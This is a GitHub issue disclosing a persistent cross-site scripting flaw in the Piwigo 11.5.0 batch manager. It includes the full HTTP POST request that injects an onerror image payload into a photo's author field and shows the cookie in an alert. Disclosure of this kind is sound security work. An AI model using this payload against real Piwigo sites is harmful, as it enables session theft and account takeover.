Skip to content

Persistent Cross Site Scripting in Batch Manager(version:11.5.0) #1476

Open
@KevDe17

Description

Description:
In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting
Vulnerable Instances:
/admin.php?page=batch_manager&mode=unit
image
affected source code file
image

request

POST /admin.php?page=batch_manager&mode=unit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit
Cookie:  pwg_id=mof6jca30q9tr1qu48hhvqi143
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit

image

suggestion
Restrict user input and output

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions